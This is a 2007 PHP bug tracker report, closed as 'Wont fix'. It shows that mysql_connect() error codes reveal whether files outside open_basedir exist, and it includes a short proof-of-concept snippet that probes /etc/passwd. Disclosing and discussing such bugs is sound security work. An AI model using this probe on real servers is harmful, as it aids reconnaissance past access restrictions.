php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #41654 open_basedir bypass via mysql_connect()
Submitted: 2007-06-11 17:12 UTC Modified: 2007-06-15 18:02 UTC
Votes:2
Avg. Score:4.5 ± 0.5
Reproduced:2 of 2 (100.0%)
Same Version:1 (50.0%)
Same OS:1 (50.0%)
From: dr at peytz dot dk Assigned:
Status: Wont fix Package: Safe Mode/open_basedir
PHP Version: 5.2.3 OS: Linux
Private report: No CVE-ID: None
Have you experienced this issue?
Rate the importance of this bug to you:

 [2007-06-11 17:12 UTC] dr at peytz dot dk
Description:
------------
file_exists() etc. does not allow checking the existence of files outside the directories specified in open_basedir.

This can be circumvented using mysql_connect(). The existence of a file can be checked using the example code below.


Reproduce code:
---------------
$filename = '/etc/passwd';
mysql_connect(':' . $filename);
$error = error_get_last();
if (strpos($error['message'], '(13)')) {
    print 'file exists';
} else {
    print 'file does not exist';
}



Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2007-06-12 12:43 UTC] iliaa@php.net
It is quite impractical for PHP to validate things like unix domain 
socket paths for all databases that support them to avoid open_basedir/
safe_mode bypasses. Had the bypass allowed reading of files, I could see 
the need to implement additional checks, but simple "presence" checks 
don't warrant hacks necessary to add such protection.
 [2007-06-15 18:02 UTC] dr at peytz dot dk
In this case, PHP doesn't need to validate the socket path. It just shouldn't add the specific error code to the error string. I doubt many people will miss the "(13)" part of the error string.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Fri Mar 29 11:01:29 2024 UTC